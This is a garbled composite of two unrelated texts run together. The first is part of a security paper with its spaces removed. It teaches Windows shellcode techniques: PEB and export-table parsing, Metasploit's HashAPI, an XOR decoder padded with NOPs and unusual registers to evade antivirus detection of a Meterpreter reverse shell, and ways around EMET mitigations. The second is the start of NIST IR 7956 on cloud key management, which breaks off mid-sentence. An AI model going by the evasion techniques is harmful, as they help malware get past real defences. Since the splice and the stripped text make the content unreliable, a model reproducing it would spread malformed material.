Windows,UNIXbasedoperatingsystemsprovidesadirectwaytocommunicatewiththe
kernelthroughtheint0x80interface,allsyscallsinsidetheUNIXbasedoperating
systemshasauniquenumber,withcallingthe0x80’thinterruptcode(int0x80),kernel
executesthesyscallwithgivennumberandparameters,buthereistheproblem,
Windowsdoesnothaveadirectkernelinterface,thismeanstherehastobeexact
pointers(memoryaddresses)tofunctionsinordertocallthemandunfortunatelyhard
codingthefunctionaddressesdoesnotfullysolvetheproblem,everyfunctionaddress
insidewindowschangesineveryservicepack,versionandevenconfiguration,usinghard
codedaddressesmakestheshellcodehighlyversiondependent,writingversion
independentshellcodesonwindowsispossiblethroughoutsolvingtheaddressing
problem,thiscanbeachievedwithfindingthefunctionaddressesdynamicallyon
runtime.
5.SolvingTheAddressingProblem
Throughoutthetimeshellcodewritersfoundcleverwaystofindtheaddressesof
WindowsAPIfunctionsonruntime,inthispaperwewillfocusonaspecificmethod
calledPEBparsing,thismethodusestheProcessEnvironmentBlock(PEB)datastructure
tolocatethebaseaddressesofloadedDLLsandfindingtheirfunctionaddresseswith
parsingtheExportAddressTable(EAT),almostallversionindependentwindows
shellcodesinsidemetasploitframeworkusesthistechniquetofindtheaddressesof
WindowsAPIfunctions,
Shellcodeswitchisusingthismethodtakesadvantageof“FS”segmentregister,in
windowsthisregisterpointsouttheThreadEnvironmentBlock(TEB)address,TEBblock
containsalotofusefuldataincludingPEBstructurewearelookingfor,whenshellcode
isexecutedinsidememoryweneedtogo48bytesforwardfromthebeginningofthe
TEBblock,
xoreax,eax
movedx,[fs:eax+48]
INVICTUS
6SecurityPaper
nowwehaveapointertoEBstructure,
AftergettingthePEBstructurepointer,nowwewillmove12bytesforwardfromthe
beginningofthePEBblockinordertogettheaddressfor“Ldr”datastructurepointer
insidePEBblock,
movedx,[edx+12]
INVICTUS
7SecurityPaper
Ldrstructurecontainsinformationabouttheloadedmodulesfortheprocess,ifwemove
20bytefurtherinsideLdrstructurewewillreachthefirstmodulefromthe
“InMemoryOrderModuleList”,
movedx,[edx+20]
NowourpointerispointingtoInMemoryOrderModuleListwitchisaLIST_ENTRY
structure,Windowsdefinesthisstructureasa“headofadoubly-linkedlistthatcontains
theloadedmodulesfortheprocess.”eachiteminthelistisapointertoan
LDR_DATA_TABLE_ENTRYstructure,thisstructureisourmaintarget,itcontainsfull
nameandbaseaddressofloadedDLLs(modules),sincetheorderoftheloadedmodules
canchange,weshouldcheckthefullnameinordertochoosetherightDLLthatis
containingthefunctionwearelookingfor,thiscanbeeasilydonewithmoving40bytes
forwardfromthestartoftheLDR_DATA_TABLE_ENTRYiftheDLLnamematchesthe
onethatwearelookingfor,wecanproceed,
INVICTUS
8SecurityPaper
withmoving16byteforwardinsideLDR_DATA_TABLE_ENTRYwenowfinallyhavethe
baseaddressoftheloadedDLL,
movedx,[edx+16]
Thefirststepofgettingthefunctionaddressesiscomplete,nowwehavethebase
addressoftheDLLthatiscontainingtherequiredfunction,wehavetoparsetheDLL’s
exportaddresstableinordertofindtherequiredfunctionaddress,exportaddresstable
islocatedinsidethePEoptionalheader,withmoving60bytesforwardfromthebase
addresswenowhaveapointertoDLL’sPEheaderonmemory,
INVICTUS
9SecurityPaper
finallyweneedtocalculatetheaddressoftheexportaddresstablewith(ModuleBase
Address+PEheaderaddress+120byte)formula,thiswillgivetheaddressoftheexport
addresstable(EAT),aftergettingtheEATaddresswenowhaveaccesstoallfunctions
thatisexportedbytheDLL,MicrosoftdescribestheIMAGE_EXPORT_DIRECTORYwith
belowfigure,
Thisstructurecontainstheaddresses,names,andnumberoftheexportedfunctions,
withusingthesamesizecalculationtraversingtechniquesdesiredfunctionaddresses
canbeobtainedinsidethisstructure,ofcoursetheorderoftheexportedfunctionsmay
changeineverywindowsversion,becauseofthisbeforeobtainingthefunction
addresses,nameofthefunctionshouldbechecked,afterbeingsureofthefunction
name,thefunctionaddressisnowinourreach,
INVICTUS
10SecurityPaper
asyoucanunderstandthismethodisallaboutcalculatingthesizeofseveralWindows
datastructuresandtraversinginsidethememory,therealchallengehereisbuildinga
reliablenamecomparingmechanismforselectingtherightDLLandfunctions,ifPEB
parsingtechniqueseemstoohardtoimplementdonotworry,thereareeasierwaytodo
this.
6.HashAPI
AlmostallshellcodesinsidemetasploitprojectusesaassemblyblockcalledHashAPI,it
isafinepieceofcodewrittenbyStephenFeweranditisusedbymajorityofWindows
theshellcodesinsidemetasploitsince2009,thisassemblyblockmakesparsingthePEB
structuremucheasier,itusesthebasicPEBparsinglogicandsomeadditionalhashing
methodsforquicklyfindingtherequiredfunctionswithcalculatingtheROR13hashof
thefunctionandmodulename,usageofthisblockisprettyeasy,itusesthestdcall
callingconventiononlydifferenceisafterpushingtherequiredfunctionparametersit
needstheROR13hashofthefunctionnameandDLLnamethatiscontainingthe
function,afterpushingtherequiredparametersandthefunctionhashitparsesthePEB
blockasexplainedearlierandfindsthemodulename,afterfindingthemodulenameit
calculatestheROR13hashandsavesittostackthenitmovestotheDLL’sexport
addresstableandcalculatestheROR13hashofeachfunctionname,ittakesthesumof
theeachfunctionnamehashandmodulenamehash,ifthesummatchesthehashthat
wearelookingfor,itmeansthewantedfunctionisfound,finallyHashAPImakesajump
tothefoundfunctionaddresswiththepassedparametersonthestack,itisavery
elegantpieceofcodebutitiscomingtoitsfinaldays,becauseofit’spopularityand
wideusage,someAVproductsandantiexploitmitigationsspecificallytargetsthework
logicofthiscodeblock,evensomeAVproductsusestheROR13hashusedbytheHash
APIassignaturesforidentifyingthemaliciousfiles,becauseoftherecentadvancements
onantiexploitsolutionsinsideoperatingsystems,HashAPIhasashortlifespanleft,but
thereareotherwaystofindtheWindowsAPIfunctionaddresses,alsowithusingsome
encodingmechanismsthismethodcanstillbypassthemajorityofAVproducts.
INVICTUS
11SecurityPaper
7.Encoder/DecoderDesign
Beforestartingtodesign,readershouldacknowledgethefactthatusingthisencoder
alonewillnotgeneratefullyundetectableshellcodes,afterexecutingtheshellcode,
decoderwillrundirectlyanddecodetheentireshellcodetoitsoriginalform,thiscan’t
bypassthedynamicanalysismechanismsoftheAVproducts.
Decoderlogicisprettysimple,itwillusearandomlygeneratedmultibyteXORkeyfor
decodingtheshellcode,afterthedecodeoperationitwillexecuteit,beforeplacingthe
shellcodeinsidethedecoderheaderitshouldbecipheredwithamultibyteXORkeyand
bothshellcodeandXORkeyshouldbeplacedinsidethe“<Shellcode>”,“<Key>”labels,
Sincethecodeisprettymuchselfexplanatory,iwillnotwastetimeforexplainingit
linebyline,withusingtheJMP/CALLtrickitgetstheaddressesofshellcodeandkeyon
runtimethenperformsalogicalXORoperationbetweeneachbyteofshellcodeandkey,
everytimethedecipherkeyreachestoenditwillresetthekeywithit’sstartaddress,
afterfinishingthedecodeoperationitwilljumptoshellcode,usinglongerXORkey
increasetherandomnessoftheshellcodebutalsoincreasestheentrophyofthecode
blocksoavoidusingtoolongdecipherkeys,
INVICTUS
12SecurityPaper
therearehundredsofwaystoencodeshellcodeswithusingbasiclogicaloperationssuch
asXOR,NOT,ADD,SUB,ROR,ROLineveryencoderroutinethereareinfinitepossible
shellcodeoutput,thepossibilityofAVproductsdetectinganysignofshellcodebefore
decodingsequenceisverylow,becauseofthisAVproductsalsodevelopsheuristic
enginesthatiscapableofdetectingdecryptionanddecodingloopsinsidecodeblocks,
therearefeweffectivemethodsforbypassingthestaticapproachesfordetecting
decoderloopswhenwritingshellcodeencoders,
UncommonRegisterUsage:
Inx86architectureallregistershaveaspecificpurpose,forexampleECXstandsfor
ExtendedCounterRegisteranditiscommonlyusedasaloopcounter,whenwewritea
basicloopconditioninanycompiledlanguage,thecompilerwillprobablyusetheECX
registerastheloopcountervariable,findingaconsecutivelyincreasingECXregister
insideacodeblockisstronglyindicatesaloopfortheheuristicengines,solutiontothis
issueissimple,notusingtheECXregisterforloopcounter,thisisjustoneexamplebutit
isalsoveryeffectiveforallotherstereotyped codefragmentslikefunction
epilogue/prologueetc..alotofcoderecognitionmechanismdependsontheregister
usage,writingassemblycodewithunusualregisterusagewilldecreasethedetection
rate.
GarbageCodePadding:
Theremaybehundredsofwaystoidentifydecodersinsidecodeblocksandalmostevery
AVproductusesdifferentapproachesbuteventuallytheyhavetogenerateasignature
forstaticallycheckingacodeblockforpossibledecoderordecryptor,usingrandomNOP
instructionsinsidethedecodercodeisanicewaytobypassstaticsignatureanalysis,it
doesn’thavetobespecificallyNOPinstruction,itcanbeanyinstructionthatmaintains
thefunctionalityoftheoriginalcode,theaimisaddinggarbageinstructionsinorderto
breakapartthemalicioussignaturesinsidecodeblock,anotherimportantthingabout
writingshellcodesisthesize,soavoidusingtoomuchgarbageobfuscationcodeinside
thedecoderoritwillincreasetheoverallsize.
INVICTUS
13SecurityPaper
Afterimplementingthismethodsresultingcodelookslikethis,
OnlychangeisbetweenEAXandECXregisters,nowtheregisterresponsiblefor
countingtheshellcodeindexisEAX,andtherearefewlinesofNOPpaddingbetween
everyXORandMOVinstructions,theshellcodeusedbythistutorialisWindows
meterpreterreverseTCP,aftercipheringtheshellcodewitha10bytelongrandomXOR
key,bothplacedinsidethedecoder,withusingthenasm-fbinDecoder.asmcommand
assemblethedecodertobinaryformat(Don’tforgettheremovethelinebreakson
shellcodeornasmwillnotasssembleit).
INVICTUS
14SecurityPaper
HereistheAVscanresultbeforeencodingtherawshellcode,

INVICTUS
15SecurityPaper
AsyoucanseealotofAVscannersrecognizestheshellcode.
Andthisistheresultforencodedshellcode,

INVICTUS
16SecurityPaper
8.AntiExploitMitigations
WhenitcomestobypassingAVproductstherearealotofwaystosuccessbutanti
exploitmitigationstakesthesituationtoawholenewlevel,Microsoftannounced
EnhancedMitigationExperienceToolkit(EMET)in2009,itisbasicallyisautilitythat
helpspreventvulnerabilitiesinsoftwarefrombeingsuccessfullyexploited,ithas
severalprotectionmechanisms,
● DynamicDataExecutionPrevention(DEP)
● StructureExceptionHandlerOverwriteprotection(SEHOP)
● NullPageAllocation
● HeapSprayProtection
● ExportAddressTableAddressFiltering(EAF)
● MandatoryASLR
● ExportAddressTableAccessFilteringPlus(EAF+)
● ROPmitigations
■ Loadlibrarychecks
■ Memoryprotectioncheck
■ Callerchecks
■ Simulateexecutionflow
■ Stackpivot
● AttackSurfaceReduction(ASR)
AmongthesemitigationsEAF,EAF+andcallerchecksconcernsusmost,asexplained
earlieralmostallshellcodesinsidemetasploitframeworkusestheStephenFewer’sHash
APIandbecauseofHashAPIappliesthePEB/EATparsingtechniques,EMETeasily
detectsandpreventstheexecutionsofshellcodes.
INVICTUS
17SecurityPaper
9.BypassingEMET
ThecallerchecksinsidetheEMETinspectstheWindowsAPIcallsmadebyprocesses,it
blockstheRETandJMPinstructionsinsideWinAPIfunctionsinordertopreventall
exploitsthatareusingreturnorientedprogramming(ROP)approaches,inHashAPIafter
findingtherequiredWinAPIfunctionaddressesJMPinstructionisusedforexecuting
thefunction,unfortunatelythiswilltriggerEMETcallerchecks,inordertobypassthe
callerchecks,usageofJMPandRETinstructionspointingtoWinAPIfunctionsshouldbe
avoided,withreplacingtheJMPinstructionthatisusedforexecutingtheWinAPI
functionwithCALL,HashAPIshouldpassthecallerchecks,butwhenwelookatthe
EAF/EAF+mitigationtechniques,theypreventsaccesstotheExportAddressTable(EAT)
forread/writeaccessdependingonthecodebeingcalledandchecksifthestackregister
iswithinthepermittedboundariesornotalsoittriestodetectreadattemptsonthe
MZ/PEheaderofspecificchaptersandKERNELBASE,thisisaveryeffectivemitigation
methodforpreventingEATparsingtechniques,butEATisnottheonlystructurethat
containstherequiredfunctionaddresses,importaddresstable(IAT)alsoholdstheWin
APIfunctionaddressesusedbytheapplication,iftheapplicationisalsousingthe
requiredfunctions,itispossibletogatherthefunctionaddressesinsidetheIAT
structure,acybersecurityresearchernamedJoshuaPittsrecentlydevelopedanew
IATparsingmethod,itfindstheLoadLibraryAandGetProcAddressWindowsAPI
functionsinsidetheimportaddresstable,afterobtainingthesefunctionaddressesany
functionfromanylibrarycanbeextracted,healsowroteatoolcalledfidoforstriping
StephenFewer’sHashAPIandreplacingwiththisIATparsingcodehewrote,ifyouwant
toreadmoreaboutthismethodcheckouthere,
INVICTUS
18SecurityPaper
10.References:
https://msdn.microsoft.com/en-us/library/ms809762.aspx
https://en.wikipedia.org/wiki/Process_Environment_Block
https://support.microsoft.com/en-us/help/875352/a-detailed-description-of-the-data-ex
ecution-prevention-dep-feature-in-windows-xp-service-pack-2,-windows-xp-tablet-pc-edi
tion-2005,-and-windows-server-2003
https://en.wikipedia.org/wiki/Portable_Executable
https://en.wikipedia.org/wiki/Address_space_layout_randomization
https://en.wikipedia.org/wiki/X86_calling_conventions
http://www.vividmachines.com/shellcode/shellcode.html
https://github.com/secretsquirrel/fido
https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellco
de/windows/x86/src/block/block_api.asm
TheShellcoder'sHandbook:DiscoveringandExploitingSecurityHoles
Sockets,Shellcode,Porting,andCoding:ReverseEngineeringExploitsandToolCoding
forSecurityProfessionalsNISTIR 7956 
 
 
Cryptographic Key Management 
Issues & Challenges in Cloud 
Services  
 
 
Ramaswamy Chandramouli  
Michaela Iorga  
Santosh Chok hani 
  
  
NISTIR 7956 
  
 
Cryptographic  Key Management 
Issues & Challenges in Cloud 
Services  
 
Ramaswamy Chandramouli  
Michaela Iorga  
Computer Security Division  
Information Technology Laboratory  
 
Santosh Chokhani  
Cygnacom  Solutions  
  
 
September 2013  
  
 
U.S. Department of Commerce  
Penny Pritzker , Secretary  
 
National Institute of Standards and Technology  
Patrick D. Gallagher, Under Secretary of Commerce for Standards and Technology and Director  
 
  
National Institute of Standar ds and Technology Interagency or Internal Report 7956  
35 pages ( September  2013)  
 
   
 Certain commercial entities, equipment, or materials may be identified in this document in order to 
describe an experimental procedure or concept adequately. Such identification is not intended to imply 
recommendation or endorsement by NIST, nor is it inte nded to imply that the entities, materials, or 
equipment are necessarily the best available for the purpose.  
There may be references in this publication to other publications currently under development by NIST 
in accordance with its assigned statutory re sponsibilities. The information in this publication, including 
concepts and methodologies, may be used by Federal agencies even before the completion of such 
companion publications. Thus, until each publication is completed, current requirements, guideline s, 
and procedures, where they exist, remain operative. For planning and transition purposes, Federal 
agencies may wish to closely follow the development of these new publications by NIST.   
Organizations are encouraged to review all draft publications duri ng public comment periods and 
provide feedback to NIST. All NIST Computer Security Division publications , other than the ones 
noted above, are available at http://csrc.nist.gov/publications . 
 
 
iii 
  
 
Reports on Computer  Systems Technology  
The Information Technology Laboratory (ITL) at the National Institute of Standards and Technology 
(NIST) promotes the U.S. economy and public welfare by providing technical leadership for the N ation’s 
measurement and standards infrastru cture. ITL develops tests, test methods, reference data, proof of 
concept implementations, and technical analyses to advance the development and productive use of 
information technology. ITL’s responsibilities include the development of management, adminis trative, 
technical, and physical standards and guidelines for the cost -effective security and privacy of other than 
national security -related information in Federal information systems.   
 
 
Abstract  
 
To interact with various services in the cloud and to s tore the data generated/processed by those services, 
several security capabilities are required. Based on a core set of features in the three common cloud 
services -  Infrastructure as a Service (IaaS), Platform as a Service (PaaS) and Software as a Service 
(SaaS), we identify a set of security capabilities needed to exercise those features and the cryptographic 
operations they entail.  An analysis of the common state of practice of the cryptographic operations that 
provide those security capabilities reveal s that the management of cryptographic keys takes on an 
additional complexity in cloud environments compared to enterprise IT environments due to: (a) 
difference in ownership (between cloud Consumers and cloud Providers) and (b) control of infrastructures 
on which both the Key Management System (KMS) and protected resources are located. This document identifies the cryptographic key management challenges in the context of architectural solutions that are commonly deployed to perform those cryptographic oper ations.  
  
Keywords  
Authentication ; Cloud Services ; Data Protection ; Encryption;  Key Management System (KMS) ; Secure 
Shell (SSH) ; Transport Layer Security (TLS)  
 
 
iv 
 Table of Contents  
Executive Summary  ....................................................................................................................................... 1 
1. Cryptographic Key Management Overview  .......................................................................................... 2 
1.1 Key Types  .......................................................................................................................................... 2 
1.2 Key States  .......................................................................................................................................... 4 
1.3 Key Management Functions  ............................................................................................................. 5 
1.4 Key Management -  Generic Security Requirements  ......................................................................... 7 
2. Cloud Computing Environment –  Evolution & State of Practice ........................................................... 8 
2.1 Three Generations of Internet  .......................................................................................................... 8 
2.2 Cloud Computing Definition (by NIST)  .............................................................................................. 8 
2.3 Cloud Computing Reference Architecture (from NIST) ................................................................... 10 
3. Cryptographic Key Management Challenges in the Cloud  .................................................................  15 
3.1 Challenges in Cryptographic Operations & Key Management for IaaS  .......................................... 16 
3.2 Challenges in Cryptographi c Operations and Key Management for PaaS  ...................................... 22 
3.3 Challenges in Cryptographic Operations & Key Management for SaaS  ......................................... 22 
Appendix A –  Security Analysis of Cryptographic Techniques for Authenticating VM Templates in the 
Cloud  ........................................................................................................................................................... 25 
A.1. VM Template  Authentication using Digital Signature  ......................................................................... 25 
A.2. VM Template  Authentication using Cryptographic Hash Function  ..................................................... 26 
A.3. VM Template  Authentication using Message Authentication Code (MAC)  ........................................ 28 
A.4. VM Template Authentication Based on Cloud Provider Discretionary Access Control ....................... 30 
A.5. Conclusion ............................................................................................................................................ 30 
Appendix B -  Bibliography  ........................................................................................................................... 31 
 
 
1 
 Executive Summary 
 
Encryption and access control are the two primary means for ensuring data confidentiality in any 
IT environment. In situations where encryption is used as a data confidentiality assurance 
measure, the management of cryptographic keys is a critical and challenging securit y 
management function, especially in large enterprise data centers, due to sheer volume and data distribution (in different physical and logical storage media), and the consequent number of 
cryptographic keys. This function becomes more complex in the case  of a cloud environment, 
where the physical and logical control of resources (both computing and networking) is split 
between cloud actors (e.g. , Consumers, Providers , and Brokers)  (see Section 2.2 below and 
NIST SP 500 -292 for more details).  
The objectiv es of this document are to identify:  
(a) The cryptographic key management issues that arise due to the distributed nature of IT 
resources, as well the distributed nature of their control, the latter split among multiple cloud 
actors. Furthermore, the patte rn of distribution varies with the type of service offering -  
Infrastructure as a Service (IaaS), Platform as a Service (PaaS) and Software as a Service (SaaS) .  
(b) the special challenges involved in deploying cryptographic key management functions that meet the security requirements of the cloud Consumers, depending upon the nature of the service 
and the type of data generated/processed/stored by the service features.  
In this document, we address the following topics:  
1. Section 1 provides an overview of c ryptographic key m anagement ;  
2. Section 2 provides a summary of the cloud computing concepts, including a  reference 
architecture (cloud a ctors , cloud service types  and deployment m odels ) as identified in 
NIST standards; and  
3. Section 3 builds on the previous sections to identify  a core set of features for the three 
main cloud service types – IaaS, PaaS and SaaS: the security capabilities (SC) required to 
exercise those features, architectural solutions available to meet the security capabilities 
and the consequent key management  challenges.  
 
In order to ensure that cryptographic mechanisms provide the desired security, the following 
criteria should be met with regards to their three main components – Algorithms (and associated modes of operation), Protocols and Implementation: 
1. The cryptographic algorithms and associated modes of operation deployed should have 
been scrutinized, evaluated, and approved using a review process that is open and includes a wide range of experts in the field.  Examples of such approved algorithms and 
 
2 
 modes are found in National Institute of Standards and Technology’s Federal Information 
Processing Standards (FIPS) and Special Publications (SPs), and in the Internet Engineering Task Force (IETF) Request for Comment (RFC) documents.  The specific NIST documents pertaining to cryptographic algorithms and associated modes of operation are: FIPS 186- 3 for Digital Signatures, FIPS 180- 4 for Secure Hash, SP 800-
38A for modes of operation and SP 800- 56A & SP 800- 56B for key establishment.   
 
2. The cryptographic protocols used should have been scrutinized, evaluated, and approved 
using a review process that is open and includes a wide range of experts in the field.  IETF protocol specifications for Secure Shell (SSH) and Transport Layer Security (TL S) 
are examples that meet these criteria.  
 
3. The implementation of a cryptographic algorithm or protocol should undergo a widely recognized and reputable independent testing for verification of conformance to underlying specifications.  NIST’s Cryptographic Algorithm Validation Program (CAVP) 
and Cryptographic Module Validation Program (CMVP) are examples of such independent testing programs. 
1. Cryptographic Key Management Overview  
In this section, we review the two broad categories of cryptographic keys, list the most 
commonly used key types, identify the key states and chart the resulting transition diagram. We 
then describe the most important key management functions (also referred to as key lifecycle 
operations) and list the generic security requirements ass ociated with these functions. 
1.1 Key Types  
Cryptographic keys fall into two broad categories:  
1. Secret key: A key that is generally used to 1) perform encryption/decryption using 
symmetric cryptographic algorithms; and/or 2) to provide data integrity using message 
authentication codes (i.e., Hash based Message Authentication Code or HMAC) or an encryption mode of operation that also provide s data integrity.  A secret key is also called 
a symmetric key, since the same key is required for encryption and decryp tion or for 
integrity value generation and integrity verification. 
2. Public/Private Key Pair:  A pair of mathematically related keys used in asymmetric 
cryptography for authentication, digital signature , or key establishment. As the name 
indicates, the privat e key is used by the owner of the key pair , is kept secret , and should 
be protected at all times, while the public key can be published and used be the relying party to complete the protocol or invert the operations performed with the private key.  
From the se broad categories one can determine the most commonly used key types in a cloud 
computing environment.  This is not to say that a cloud implementation may not have additional 
types of keys.  
 
3 
 1. Public/Private Authentication Key Pair:  This key pair is used by  one party (peer, client 
or server) to authenticate to the other party.  Its typical use entails combining a random 
challenge with the signer -generated random number and signing the result for the benefit 
of the challenger who wishes to authenticate the pr ivate -key holder.  Examples of usage 
include client -authenticated Transport Layer Security (TLS), Virtual Private Network 
(VPN) authentication, and smart card -based logon.  An authentication key pair is 
generally used in a network environment and is genera lly used for long- term use (e.g., up 
to 3 years)  
2. Public/Private Signature Key Pair:  The private key of the key pair is used by one party 
to digitally sign a message/data, while  the corresponding public key is used to verify the 
signature.  Examples of the usage of a signature key pair are signed Secure/Multipart Internet Mail Extensions (S/MIME) messages, signed electronic documents, and signed code.  In some implementations, a key pair may be used for both authentication and signature functions.  A signature key pair is generally used in a network environment and is generally used for long- term use (e.g., up to 3 years).  It may also be used to generate 
and verify signatures on stored data.  
3. Public/Private Key Establishment  Pair:  This key pair is used to securely establish a 
key between parties. Examples of the use of a key pair for key establishment are encrypting the symmetric key for S/MIME payload encryption/decryption and encrypting the random secret to be sent from a TLS client to a server.  It is recom mended that key 
establishment key pairs be distinct from authentication and signature key pairs.  However, it is recognized that some devices such as web servers use the same key pair for key establishment and authentication.  A key establishment key pair is traditionally 
used in a network environment, but some usage for stored data is also seen and can be envisioned.  A key establishment key pair is generally used for a pre -defined period for 
encryption (e.g., up to 3 years), but is used for decryption for  as long as the 
confidentiality of the data needs to be protected.  
4. Symmetric Encryption/Decryption Key:  A symmetric key is used to encrypt and 
decrypt data or messages.  For data- in-transit, a symmetric encryption/decryption key 
may have a short life, typi cally for each message (e.g., S/MIME message) or for each 
session (for example a TLS session).  For stored data, the symmetric life of the encryption/decryption key tends to be as long as the confidentiality of the data needs to be protected.  
5. Symmetric Message Authentication Code (MAC)  Key:  A symmetric key is used to 
provide assurance for the integrity of data .  There are three techniques used to provide 
this assurance: 1) use a symmetric encryption algorithm and a MAC mode of operation (e.g., CMAC using AES); 2) use a symmetric encryption algorithm and an authenticated encryption mode of operation (e.g., GCM or CCM using AES); and 3) use a hash- based 
MAC (HMAC).  For data -in-transit, a symmetric MAC key has a short life, typically for 
a single  message or  for a single  session (for example a TLS session).  For stored data, the 
life of a  symmetric MAC key tends to be for as long as the data needs to be protected.  
Note that when authenticated encryption mode is used, the same key is used for both the 
 
4 
 MAC and  encryption/decryption, since both objectives are achieved by invoking a single 
mode of operation. 
6. Symmetric Key Wrapping  Key:  A symmetric key is used to encrypt a symmetric key or 
an asymmetric private key.  A Key Wrapping Key is also called a Key Encrypt ing Key.  
 
1.2 Key States  
A symmetric key or public/private key pair can undergo the following states.  This is not to say 
that a key management implementation may not have additional states.  Alternatively, a key management implementation may have a subset of  these states.  
• Generation:  A symmetric key or public/private key pair is generated when required.  
 
• Activation:  A symmetric key or private key is activated when it is required to be used.  A 
public key is activated when it is made available or  on the date indicated in its associated 
metadata (e.g., notBefore date in an X.509 public key certificate).  
 
• Deactivation:  A symmetric key or private key is deactivated when it is no longer 
required for applying cryptographic protection to data.  Deactivation of these  keys may 
be followed by destruction or archival.  A public key is not deactivated. It may expire (e.g., at the notAfter date in an X.509 public key certificate), or may be suspended (e.g., via certificate revocation list (CRL) [refer RFC 4949] in X.509 st andard) or revoked 
(e.g., via CRL in X.509 standard).  
 
• Suspension: A key may be suspended from use for a variety of reasons, such as an 
unknown status of the key or due to the key owner being temporarily away.  In the case 
of the public key, suspension of the companion private key is communicated to the relying parties. This may be communicated as an  “On hold” revocation reason code in a CRL and in an Online Certificate Status Protocol (OCSP) response  
 
• Expiration:  A key may expire due to the end of its crypto period [refer RFC 4949].  In 
the case of a public key, an expiration date is indicated in the associated metadata (e.g., 
notAfter date in X.509 certificates).  
 
• Destruction: A key is destroyed when it is no longer needed.  
 
• Archival:  A key may be archived when it is no longer required for normal use, but may 
be needed after the key’s cryptoperiod.  An example for secret or private keys is the possible decryption of archived data.  An example for public keys is the verification of archived signed documents.  
• Revocation:  A revocation is explicitly stated with respect to public keys; however, the 
revocation also applies to the corresponding private key.  Revocation information is securely communicated to the relying parties, for example, as CRLs or OCSP responses, 
 
5 
 in the c ase of X.509 public key certificates.  Secret keys are also “revoked”, often by 
including them on lists, such as a compromised key list.  
 
The following is the state diagram for the key states.  
 
Figure 1: State Diagram for the Key States  
 
1.3 Key Management Functions  
The following are the important key management functions:  
• Generate Key: The g eneration of good- quality keys is critical to security.  Keys for a 
cryptographic algorithm should be generated in cryptographic modules that  have been 
approved for the generation of keys for that algorithm.   
• Generate Domain Parameters: Discrete Logarithm -based algorithms require the 
generation of domain parameter s prior to the generation of the keys ; the keys are 
generated using those domain parameters .  The d omain parameters for an algorithm shall  
be generated in approved cryptographic modules that  have been approved for their 

 
6 
 generation.  Since domain parameters can be common to a broad community of users, 
key generation  need not entail doma in parameter generation.  For example, defining Suite 
B P-256 curve defines all the domain parameters for the attendant ECDSA and ECDH 
algorithms.  
• Bind Key and Metadata:  A key may have associated data, such as the time period of 
use, usage constraints (suc h as authentication, encryption, and/or key establish ment) , 
domain parameters, and security services  for which they are used, such as source 
authentication, integrity, and confidentiality  protection.  This function provides assurance 
that the key is associ ated with the  correct metadata.   
• Bind a Key to an Individual: The  identifier of the  individual or other entity that  own s a 
key is considered as part of the key’s  metadata, but this association  is sufficiently critical 
to be listed as a distinct function.  
• Activate Key: This function transitions a key to the active state.  It is often  done in 
conjunction with key generation.  
• Deactivate Key: This function is generally done when a key is no longer needed for applying cryptographic protection.  For example, when a key has expired, or is replaced by another key . 
• Backup Key:  A key is backed by the owner, the key management infrastructure , or a 
third party in order to reconstitute the key when it is accidentally destroyed or otherwise unavailable.  When a private or secret key is backed up by the key management infrastructure or by a third party, the function is also referred to as “key escrow”.  
• Recover Key:  This function is complementary to the key backup function and is invoked 
when the key is unavailable for som e reason and is required by the authorized parties.  
Key backup and recovery generally applies to the symmetric and private keys.  
• Modify Metadata:  This function is invoked when metadata bound to a key needs  to 
change.  The r enewal of a public key certificate is an example of this function where the 
validity period for the public key is changed.  
• Rekey:  This function is used to replace the existing key with a new key.  Generally, the 
existing key (the key being replaced) plays a role in authentication and authorization for 
replacement.  
• Suspend a Key:  This function is used to temporarily cease the use of a key.  It is akin to 
reversible revocation.  This function may ne ed to be invoked if the status of a key is 
undetermined or if the key owner wishes to temporarily suspend its use (e.g., for extended leave).  For secret key s, this can also be accomplished via key deactivation.  For 
public key s and the companion private key , this is generally done using suspension 
notification  of the public key.  
 
7 
 • Restore a Key:  This function is used to restore a suspended key once its secure status is 
ascertained.   For secret keys, this can also be accomplished via key activation.  For public 
keys and the companion private keys , this is generally done using a revocation 
notifica tion where the revoked public key entry is deleted implying the key is valid. 
• Revoke a Key:  This function is used to inform the relying parties to stop using a public 
key.  There may be a variety of reasons for this , includi ng the compromise of companion 
private key , and the owner having stopped using the companion private key.  
• Archive a Key:  This function is used to store a key in long- term storage after it has been 
deactivated, expired, and/or compromised. 
• Destroy a Key:  This function is used to zeroize a key when it should no longer be used . 
• Manage TA Store : This function is used by the relying party to determine what trust 
anchors to trust for what purpose.  A trust anchor is a public key and its associated 
metadata that the relying party explicitly trusts and uses to establish trust in other public keys via transitive trust , such as a public -key certification path that is a series of public 
key certificates where the digital signature in one certificate can be used t o verify the 
digital signature on the next certificate.  
1.4 Key Management - Generic Security Requirements  
The following are general key management  security requirements : 
1. Parties performing key management functions are properly authenticated and their authoriz ations to perform the key management functions for a given key are properly 
verified.  
 
2. All key management commands and associated data are protected from spoofing, i.e., source authentication is performed prior to executing a command.  
 
3. All key management c ommands and associated data are protected from undetected, 
unauthorized modifications, i.e., integrity protection is provided.  
4. Secret and private keys are protected from unauthorized disclosure.  
5. All keys and metadata are protected from spoofing, i.e., source authentication is performed prior to accessing keys and metadata.  
 
6. All keys and metadata are protected from undetected, unauthorized modifications, i.e., integrity protection is provided.  
7. When cryptography is used as a protection mechanism for any of  the above, the security 
strength of the cryptographic mechanism used is at least as strong as the security strength required for the keys being managed.  
 
 
8 
 There are significant challenges to implement ing these key management security requirements in 
cloud computing over unsecure public networks. In the next sections , we review the cloud 
computing reference architecture and identify, for the three main cloud service types – IaaS, 
PaaS and SaaS  - a core set of features, the security capabilities (SC) required  to exercise th ese 
features, architectural solutions available to meet the security capabilities , and the consequent 
key management  challenges.  
2. Cloud Computing Environment – Evolution & State of Practice  
2.1 Three Generations of Internet  
The evolution of the internet can be divided into three generations: in the 70s the first generation 
was marked by expensive mainframe computers accessed from terminals; the second generation 
was born in the late 80s and early 90s and was identified by the  explosion of personal computers 
with Graphical User Interfaces (GUIs) ; the first decade of the 21st century brought the third 
generation , defined by mobile computing, the “internet of things” and cloud computing.  
In 1997, Professor Ramnath Chellappa of E mory University, defined cloud computing for the 
first time while a faculty member at the University of South California, as an important new 
“computing paradigm where the boundaries of computing will be determined by economic 
rationale rather than technic al limits alone .” Even though the international IT literature and 
media have come forward since then with a large number of definitions, models and 
architectures for cloud computing, autonomic and utility computing were the foundations of 
what the communit y commonly referred to as “cloud computing”. In the early 2000s , companies 
started rapidly adopting this concept upon the realization that cloud computing could benefit 
both the Provider s as well as the Consumer s of services. Businesses started delivering computing 
